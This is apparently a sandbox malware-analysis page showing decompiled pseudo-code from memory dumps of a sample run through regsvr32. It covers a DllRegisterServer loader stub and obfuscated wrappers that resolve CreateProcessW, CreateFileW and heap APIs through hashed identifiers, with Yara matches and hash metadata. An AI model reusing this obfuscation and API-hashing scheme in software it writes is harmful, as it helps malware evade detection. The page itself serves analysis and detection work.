Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID: T}O
API String ID: 4033686569-2430299532
Opcode ID: 33b0968ab82e3241579f04d806c8c0f2fcaa2d11a57cace8da408b8f4b91dd4b
Instruction ID: 8e1f2d067ce166e63d5b380458519611d59c4dbb03d1a309840200788433c1a1
Opcode Fuzzy Hash: 33b0968ab82e3241579f04d806c8c0f2fcaa2d11a57cace8da408b8f4b91dd4b
Instruction Fuzzy Hash: 140132B1D01208FBCB04DFA8D8469CEBFB4EB00318F20C199E504B7250E7B82B448F95

Uniqueness

Uniqueness Score: -1.00%

Function 100048A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E100048A0() {
				int _t1;

				_t1 =  *0x100381a0; // 0x33bed20
				if(_t1 == 0) {
					ExitProcess(_t1);
				}
				_push("DllRegisterServer");
				_push(_t1);
				 *((intOrPtr*)(E10004080()))(); // executed
				return 0;
			}

0x100048a0
0x100048a7
0x100048aa
0x100048aa
0x100048b0
0x100048b5
0x100048be
0x100048c2

APIs

ExitProcess.KERNEL32 ref: 100048AA

Strings

DllRegisterServer, xrefs: 100048B0

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ExitProcess
String ID: DllRegisterServer
API String ID: 621844428-1663957109
Opcode ID: ccc7c0eae74798fa411578d6a7fc94d054faac17a6a197938a0b76dede91f9e0
Instruction ID: 960098ebdd1f6929504dd613744f7588e9acc96a2f61373274c5c14cd7ddede6
Opcode Fuzzy Hash: ccc7c0eae74798fa411578d6a7fc94d054faac17a6a197938a0b76dede91f9e0
Instruction Fuzzy Hash: F3C04CF5A017519BF601EBB4AD89A4B22DCEB9028A7464868F500D2015EF34E5058765

Uniqueness

Uniqueness Score: -1.00%

Function 10013955 Relevance: 3.1, APIs: 2, Instructions: 59
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 76%

			E10013955(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				long _t23;
				long _t31;
				void* _t33;
				void* _t34;
				void* _t40;

				_push(0x10);
				_push(0x1002e908);
				E10012CE0(__ebx, __edi, __esi);
				_t31 =  *(_t33 + 8) *  *(_t33 + 0xc);
				 *(_t33 - 0x20) = _t31;
				if(_t31 == 0) {
					_t31 = _t31 + 1;
				}
				do {
					_t28 = 0;
					 *(_t33 - 0x1c) = 0;
					if(_t31 > 0xffffffe0) {
						L9:
						if(_t28 != 0 ||  *0x1003a33c == _t28) {
							L13:
							_t15 = _t28;
							L14:
							return E10012D1B(_t15);
						} else {
							goto L11;
						}
					}
					if( *0x1003b804 != 3) {
						L7:
						if(_t28 != 0) {
							goto L13;
						}
						L8:
						_t17 = RtlAllocateHeap( *0x1003b800, 8, _t31); // executed
						_t28 = _t17;
						goto L9;
					}
					_t31 = _t31 + 0x0000000f & 0xfffffff0;
					 *(_t33 + 0xc) = _t31;
					_t23 =  *(_t33 - 0x20);
					_t40 = _t23 -  *0x1003b7f0; // 0x0
					if(_t40 > 0) {
						goto L7;
					}
					E10014CDE(_t23, 0, 4);
					 *(_t33 - 4) =  *(_t33 - 4) & 0;
					_push(_t23);
					 *(_t33 - 0x1c) = E10015536();
					 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
					E100139FF();
					_t28 =  *(_t33 - 0x1c);
					if(_t28 == 0) {
						goto L8;
					}
					E10012400(_t28, 0,  *(_t33 - 0x20));
					_t34 = _t34 + 0xc;
					goto L7;
					L11:
				} while (E10015832(_t31) != 0);
				goto L14;
			}

0x10013955
0x10013957
0x1001395c
0x10013964
0x10013968
0x1001396d
0x1001396f
0x1001396f
0x10013970
0x10013970
0x10013972
0x10013978
0x100139df
0x100139e1
0x10013a08
0x10013a08
0x10013a0a
0x10013a0f
0x00000000
0x00000000
0x00000000
0x100139e1
0x10013981
0x100139ca
0x100139cc
0x00000000
0x00000000
0x100139ce
0x100139d7
0x100139dd
0x00000000
0x100139dd
0x10013986
0x10013989
0x1001398c
0x1001398f
0x10013995
0x00000000
0x00000000
0x10013999
0x1001399f
0x100139a2
0x100139a9
0x100139ac
0x100139b0
0x100139b5
0x100139ba
0x00000000
0x00000000
0x100139c2
0x100139c7
0x00000000
0x100139eb
0x100139f2
0x00000000

APIs

__lock.LIBCMT ref: 10013999
RtlAllocateHeap.NTDLL(00000008,?,1002E908,00000010,1001431B,00000001,0000008C,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000), ref: 100139D7

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocateHeap__lock
String ID:
API String ID: 4078605025-0
Opcode ID: 1efdde6269329017fd9cb6d282c05739c9870792f2908ad2ff079d595b1107f0
Instruction ID: 12de62318e65f95c4d9448aeaa1d0f6e4867f5423e76a248edee776cfd5b0317
Opcode Fuzzy Hash: 1efdde6269329017fd9cb6d282c05739c9870792f2908ad2ff079d595b1107f0
Instruction Fuzzy Hash: 1811043AC00A69AADB12DB648C4168D7BB5FF807A0F128206F9642F2D1CB34D8C18B95

Uniqueness

Uniqueness Score: -1.00%

Function 1001111B Relevance: 3.0, APIs: 2, Instructions: 35
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 18%

			E1001111B() {
				char _t9;
				intOrPtr _t12;
				void* _t14;
				void* _t19;
				void* _t20;
				intOrPtr _t21;
				void* _t22;

				_push(0xc);
				_push(0x1002e808);
				_t9 = E10012CE0(_t14, _t19, _t20);
				_t21 =  *((intOrPtr*)(_t22 + 8));
				if(_t21 != 0) {
					if( *0x1003b804 != 3) {
						_push(_t21);
						goto L7;
					} else {
						E10014CDE(_t14, _t19, 4);
						 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
						_t12 = E10014D57(_t21);
						 *((intOrPtr*)(_t22 - 0x1c)) = _t12;
						if(_t12 != 0) {
							_push(_t21);
							_push(_t12);
							E10014D82();
						}
						 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
						_t9 = E1001116E();
						if( *((intOrPtr*)(_t22 - 0x1c)) == 0) {
							_push( *((intOrPtr*)(_t22 + 8)));
							L7:
							_push(0);
							_t9 = RtlFreeHeap( *0x1003b800); // executed
						}
					}
				}
				return E10012D1B(_t9);
			}

0x1001111b
0x1001111d
0x10011122
0x10011127
0x1001112c
0x10011135
0x10011177
0x00000000
0x10011137
0x10011139
0x1001113f
0x10011144
0x1001114a
0x1001114f
0x10011151
0x10011152
0x10011153
0x10011159
0x1001115a
0x1001115e
0x10011167
0x10011169
0x10011178
0x10011178
0x10011180
0x10011180
0x10011167
0x10011135
0x1001118b

APIs

__lock.LIBCMT ref: 10011139

Part of subcall function 10014CDE: EnterCriticalSection.KERNEL32(?,?,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?), ref: 10014D06

RtlFreeHeap.NTDLL(00000000,?,1002E808,0000000C,10014CC2,00000000,1002EB78,00000008,10014CF7,?,?,?,100143E9,0000000D,1002E968,00000010), ref: 10011180

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalEnterFreeHeapSection__lock
String ID:
API String ID: 3012239193-0
Opcode ID: c7da2b1efa687549a2cae6f7b89228f0afd3e79e7fc5b7caa793621a9dd5d032
Instruction ID: b8a8fd4867bae441b9044e63338476c2f5ed1107b97994fc0164613fed314693
Opcode Fuzzy Hash: c7da2b1efa687549a2cae6f7b89228f0afd3e79e7fc5b7caa793621a9dd5d032
Instruction Fuzzy Hash: 27F0B435842615BAEB29DB60DC06BDEBBB4EF003A5F214205F7146E0E1CF34E9C1CA90

Uniqueness

Uniqueness Score: -1.00%

Function 1001118C Relevance: 3.0, APIs: 2, Instructions: 34
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 63%

			E1001118C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t19;
				void* _t21;
				void* _t24;

				_push(0xc);
				_push(0x1002e818);
				E10012CE0(__ebx, __edi, __esi);
				_t19 =  *(_t21 + 8);
				if( *0x1003b804 != 3) {
					L3:
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					if( *0x1003b804 != 1) {
						_t19 = _t19 + 0x0000000f & 0xfffffff0;
					}
					_t9 = RtlAllocateHeap( *0x1003b800, 0, _t19); // executed
				} else {
					_t24 = _t19 -  *0x1003b7f0; // 0x0
					if(_t24 > 0) {
						goto L3;
					} else {
						E10014CDE(__ebx, __edi, 4);
						 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
						_push(_t19);
						 *(_t21 - 0x1c) = E10015536();
						 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
						E100111FE();
						_t9 =  *(_t21 - 0x1c);
						if( *(_t21 - 0x1c) == 0) {
							goto L3;
						}
					}
				}
				return E10012D1B(_t9);
			}

0x1001118c
0x1001118e
0x10011193
0x10011198
0x100111a2
0x100111d2
0x100111d4
0x100111d6
0x100111d6
0x100111de
0x100111e3
0x100111e3
0x100111ef
0x100111a4
0x100111a4
0x100111aa
0x00000000
0x100111ac
0x100111ae
0x100111b4
0x100111b8
0x100111bf
0x100111c2
0x100111c6
0x100111cb
0x100111d0
0x00000000
0x00000000
0x100111d0
0x100111aa
0x100111fa

APIs

__lock.LIBCMT ref: 100111AE

Part of subcall function 10014CDE: EnterCriticalSection.KERNEL32(?,?,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?), ref: 10014D06

RtlAllocateHeap.NTDLL(00000000,?,1002E818,0000000C,10011217,000000E0,10011242,?,10014C61,00000018,1002EB78,00000008,10014CF7,?,?), ref: 100111EF

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocateCriticalEnterHeapSection__lock
String ID:
API String ID: 409319249-0
Opcode ID: 170503ab05a8c3c380249ea4d73da73123f21724a0634e09c26a9d4764d0f5f9
Instruction ID: 40c030b676b6377b818ff1b8a851e4bd1af64643cdb439750a8e94ae93b3a302
Opcode Fuzzy Hash: 170503ab05a8c3c380249ea4d73da73123f21724a0634e09c26a9d4764d0f5f9
Instruction Fuzzy Hash: 2BF0F635C41926BAEB15EBA49C057CDB7B0FF003A4F154114EB242F1E1CB30AD91CAD4

Uniqueness

Uniqueness Score: -1.00%

Function 10014ABB Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10014ABB(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x1003b800 = _t6;
				if(_t6 == 0) {
					L4:
					return 0;
				} else {
					_t8 = E10014AA1();
					 *0x1003b804 = _t8;
					if(_t8 != 3 || E10014D0F(0x3f8) != 0) {
						return 1;
					} else {
						HeapDestroy( *0x1003b800);
						goto L4;
					}
				}
			}

0x10014acc
0x10014ad4
0x10014ad9
0x10014b05
0x10014b07
0x10014adb
0x10014adb
0x10014ae3
0x10014ae8
0x10014b0b
0x10014af9
0x10014aff
0x00000000
0x10014aff
0x10014ae8

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,100117A5,00000001,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014ACC

Part of subcall function 10014D0F: HeapAlloc.KERNEL32(00000000,00000140,10014AF4,000003F8,?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014D1C

HeapDestroy.KERNEL32(?,?,?,10011907,?,?,?,1002E838,0000000C), ref: 10014AFF

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Heap$AllocCreateDestroy
String ID:
API String ID: 2236781399-0
Opcode ID: b4851fbc967e80632ceaae16085051e2ffb8b9a716274a9c9d1963887c1b1d72
Instruction ID: 59fce647b509f96afedaaf5052f810ceff91ac9638c41baf0393a9b783b9727a
Opcode Fuzzy Hash: b4851fbc967e80632ceaae16085051e2ffb8b9a716274a9c9d1963887c1b1d72
Instruction Fuzzy Hash: D6E01A70694755AEEB02AB304C8571636E8EB446C7F138829F515CE0B1EF70D684D611

Uniqueness

Uniqueness Score: -1.00%

Function 04F63CF2 Relevance: 1.6, APIs: 1, Instructions: 66
processCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E04F63CF2(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28, struct _STARTUPINFOW* _a36, intOrPtr _a40, intOrPtr _a44, WCHAR* _a48, intOrPtr _a52, struct _PROCESS_INFORMATION* _a56, int _a68, intOrPtr _a72) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t49;
				int _t55;

				_push(_a72);
				_push(_a68);
				_push(0);
				_push(0);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E04F732C4(_t49);
				_v16 = 0xb4449;
				_v12 = 0xaf71da;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0xd2e4cd37;
				_v12 = _v12 ^ 0xd2eba9ee;
				_v8 = 0x5ccf0c;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0xadf7264e;
				_v8 = _v8 + 0xa6d9;
				_v8 = _v8 ^ 0x6101dde6;
				_v16 = 0x827240;
				_v16 = _v16 | 0x4deb9a03;
				_v16 = _v16 << 7;
				_v16 = _v16 ^ 0xf5fc4edb;
				E04F652F2(__ecx, __edx, __ecx, 0x3c, 0xb6cd31cd, 0x9f49d153);
				_t55 = CreateProcessW(_a12, _a48, 0, 0, _a68, 0, 0, 0, _a36, _a56); // executed
				return _t55;
			}

0x04f63cf9
0x04f63cfe
0x04f63d01
0x04f63d02
0x04f63d03
0x04f63d06
0x04f63d09
0x04f63d0c
0x04f63d0f
0x04f63d12
0x04f63d15
0x04f63d16
0x04f63d19
0x04f63d1a
0x04f63d1d
0x04f63d20
0x04f63d23
0x04f63d26
0x04f63d29
0x04f63d2a
0x04f63d2b
0x04f63d30
0x04f63d3a
0x04f63d41
0x04f63d45
0x04f63d49
0x04f63d50
0x04f63d57
0x04f63d5e
0x04f63d62
0x04f63d69
0x04f63d70
0x04f63d77
0x04f63d7e
0x04f63d85
0x04f63d89
0x04f63da6
0x04f63dc2
0x04f63dc8

APIs

CreateProcessW.KERNELBASE(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 04F63DC2

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 42fd4307bacc93a776153ef9d045413ca2cc6bc19595c84c0f50917a0ddc6c5f
Instruction ID: 53e1122ef033e2c686bd305b411de9166e4cc7b1018a0ae74aa780a16b449a23
Opcode Fuzzy Hash: 42fd4307bacc93a776153ef9d045413ca2cc6bc19595c84c0f50917a0ddc6c5f
Instruction Fuzzy Hash: 88219E32801218BBCF56AFD5DD098CEBF75EF09394F008088FA1962120C3768664EF91

Uniqueness

Uniqueness Score: -1.00%

Function 04F7602C Relevance: 1.6, APIs: 1, Instructions: 66
fileCOMMON

Download Yara Rule

C-Code - Quality: 55%

			E04F7602C(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, long _a20, WCHAR* _a24, intOrPtr _a28, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t42;
				void* _t50;
				signed int _t53;
				long _t57;
				long _t58;

				_t58 = __edx;
				_push(0);
				_push(_a36);
				_t57 = __ecx;
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t42);
				_v32 = 0xf2bcc;
				_v28 = 0x9963f;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0x481e97;
				_v12 = _v12 + 0x3bb9;
				_v12 = _v12 | 0xe5ca697e;
				_v12 = _v12 ^ 0xe5cf84b6;
				_v8 = 0xca7b5c;
				_t53 = 0x38;
				_v8 = _v8 / _t53;
				_v8 = _v8 >> 6;
				_v8 = _v8 ^ 0x0004807b;
				_v16 = 0xf3cd85;
				_v16 = _v16 ^ 0x0b7576d7;
				_v16 = _v16 ^ 0x0b87a2f8;
				E04F652F2(_t53, _v8 % _t53, _t53, 0xf4, 0xbdcc8d36, 0x9f49d153);
				_t50 = CreateFileW(_a24, _a20, _a12, 0, _t57, _t58, 0); // executed
				return _t50;
			}

0x04f76037
0x04f76039
0x04f7603a
0x04f7603d
0x04f7603f
0x04f76040
0x04f76043
0x04f76046
0x04f76049
0x04f7604c
0x04f7604f
0x04f76052
0x04f76055
0x04f76056
0x04f76057
0x04f7605c
0x04f76066
0x04f7606f
0x04f76072
0x04f76075
0x04f7607c
0x04f76083
0x04f7608a
0x04f76091
0x04f7609d
0x04f760a5
0x04f760a8
0x04f760ac
0x04f760b3
0x04f760ba
0x04f760c1
0x04f760dc
0x04f760f1
0x04f760f9

APIs

CreateFileW.KERNELBASE(000F2BCC,0009963F,911404DD,00000000,?,00000000,00000000), ref: 04F760F1

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 6d1239d744402909eaf6f0c2dda43dfc09e7586af067e989eca2d59162b3ddb8
Instruction ID: 22f8bf1ab834481694cfba76ea25770391bbe1074b4757b48e9cae158bd10745
Opcode Fuzzy Hash: 6d1239d744402909eaf6f0c2dda43dfc09e7586af067e989eca2d59162b3ddb8
Instruction Fuzzy Hash: 0421257290020DBFDF05DF95DC858AFBFB9EB44358F108098FA1462220D7768A65AB90

Uniqueness

Uniqueness Score: -1.00%

Function 04F789C9 Relevance: 1.5, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E04F789C9(void* __ecx, void* __edx, void* _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				intOrPtr _v20;
				void* _t28;
				char _t34;
				void* _t37;

				_push(_a12);
				_t37 = __edx;
				_push(0);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t28);
				_v20 = 0xfe879;
				_v16 = 0x1b168;
				_v12 = 0x80e690;
				_v12 = _v12 | 0x46582297;
				_v12 = _v12 + 0xffffc97a;
				_v12 = _v12 ^ 0x46d7fd18;
				_v16 = 0x13187e;
				_v16 = _v16 >> 4;
				_v16 = _v16 ^ 0x0006b0af;
				_v8 = 0xe112ab;
				_v8 = _v8 ^ 0x04f2baba;
				_v8 = _v8 + 0xfffff742;
				_v8 = _v8 ^ 0x041ecc34;
				E04F652F2(__ecx, __edx, __ecx, 0xa7, 0x5bb15cf1, 0x9f49d153);
				_t34 = RtlFreeHeap(_a4, 0, _t37); // executed
				return _t34;
			}

0x04f789d0
0x04f789d3
0x04f789d5
0x04f789d7
0x04f789da
0x04f789db
0x04f789dc
0x04f789e1
0x04f789eb
0x04f789f2
0x04f789f9
0x04f78a00
0x04f78a07
0x04f78a0e
0x04f78a15
0x04f78a19
0x04f78a20
0x04f78a27
0x04f78a2e
0x04f78a35
0x04f78a55
0x04f78a63
0x04f78a69

APIs

RtlFreeHeap.NTDLL(46D7FD18,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 04F78A63

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2e951f101b2a2ca338307c55f36bbaa5a0661a3a78d5bbf1223c6606bb936ef8
Instruction ID: d41cf0fba41418ab295bb78ddebc94f79b6eed981722d3e32e836128edc2cccc
Opcode Fuzzy Hash: 2e951f101b2a2ca338307c55f36bbaa5a0661a3a78d5bbf1223c6606bb936ef8
Instruction Fuzzy Hash: 110175B1D00308BBDB24DFA5DC0AA8EBFB4EF00304F108588A82477260D3B5AB50DF81

Uniqueness

Uniqueness Score: -1.00%

Function 04F68B6C Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04F68B6C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _t29;
				int _t35;
				void* _t38;

				_push(_a8);
				_t38 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04F732C4(_t29);
				_v20 = 0x5d7bf;
				_v16 = 0x99716;
				_v16 = 0xe29eb1;
				_v16 = _v16 ^ 0x3393c2ed;
				_v16 = _v16 ^ 0x337b9675;
				_v8 = 0xbc32bf;
				_v8 = _v8 + 0xffff25e6;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 ^ 0xde5dd6d8;
				_v8 = _v8 ^ 0xde59c7e5;
				_v12 = 0xe3d251;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0x08a6b2c4;
				_v12 = _v12 ^ 0x08adb9ba;
				E04F652F2(__ecx, __edx, __ecx, 0x34, 0x2b7f8c29, 0x9f49d153);
				_t35 = FindCloseChangeNotification(_t38); // executed
				return _t35;
			}

0x04f68b73
0x04f68b76
0x04f68b78
0x04f68b7b
0x04f68b7c
0x04f68b7d
0x04f68b82
0x04f68b8c
0x04f68b93
0x04f68b9a
0x04f68ba1
0x04f68ba8
0x04f68baf
0x04f68bb6
0x04f68bba
0x04f68bc1
0x04f68bc8
0x04f68bcf
0x04f68bd3
0x04f68bda
0x04f68bf7
0x04f68c00
0x04f68c06

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?), ref: 04F68C00

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: d6461675db5e5e1fdae447af73487a38bc4d14b904fac464a7ebfd6aadb21cc1
Instruction ID: e196a6d8aab4870210435cac259a9c88c442d9f0d15dc557b615eed3fa139139
Opcode Fuzzy Hash: d6461675db5e5e1fdae447af73487a38bc4d14b904fac464a7ebfd6aadb21cc1
Instruction Fuzzy Hash: B1011775C0521CFBDB14EFA8894A88EBBB4EF00318F108489E825B7250D7759B15DF90

Uniqueness

Uniqueness Score: -1.00%

Function 100285E7 Relevance: 1.5, APIs: 1, Instructions: 39
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E100285E7(intOrPtr* __ecx) {
				intOrPtr _t12;
				intOrPtr _t14;
				signed char* _t15;
				long* _t17;
				long* _t19;
				intOrPtr _t23;
				intOrPtr* _t26;
				void* _t28;

				E10011A8C(E1002A9FC, _t28);
				_push(__ecx);
				_t26 = __ecx;
				if( *__ecx == 0) {
					_t20 =  *0x10039e40; // 0x10039e44
					if(_t20 == 0) {
						 *((intOrPtr*)(_t28 - 0x10)) = 0x10039e44;
						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
						_t15 = E10028420(0x10039e44);
						 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
						_t20 = _t15;
						 *0x10039e40 = _t15; // executed
					}
					_t14 = E100281D9(_t20); // executed
					 *_t26 = _t14;
				}
				_t17 =  *0x10039e40; // 0x10039e44
				_t23 = E100282E5(_t17,  *_t26);
				if(_t23 == 0) {
					_t12 =  *((intOrPtr*)(_t28 + 8))();
					_t19 =  *0x10039e40; // 0x10039e44
					_t23 = _t12;
					E100284C5(_t19,  *_t26, _t23);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return _t23;
			}

0x100285ec
0x100285f1
0x100285f3
0x100285f9
0x100285fb
0x10028603
0x1002860a
0x1002860d
0x10028611
0x10028616
0x1002861a
0x1002861c
0x1002861c
0x10028622
0x10028627
0x10028627
0x1002862b
0x10028636
0x1002863a
0x1002863c
0x1002863f
0x10028645
0x1002864a
0x1002864a
0x10028656
0x1002865e

APIs

__EH_prolog.LIBCMT ref: 100285EC

Part of subcall function 10028420: TlsAlloc.KERNEL32(?,10028616,00000000,?,?,10027756,100272A4,10027772,1001E169,10006E4C,?,10006E8A,8007000E,10006F40), ref: 10028442

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
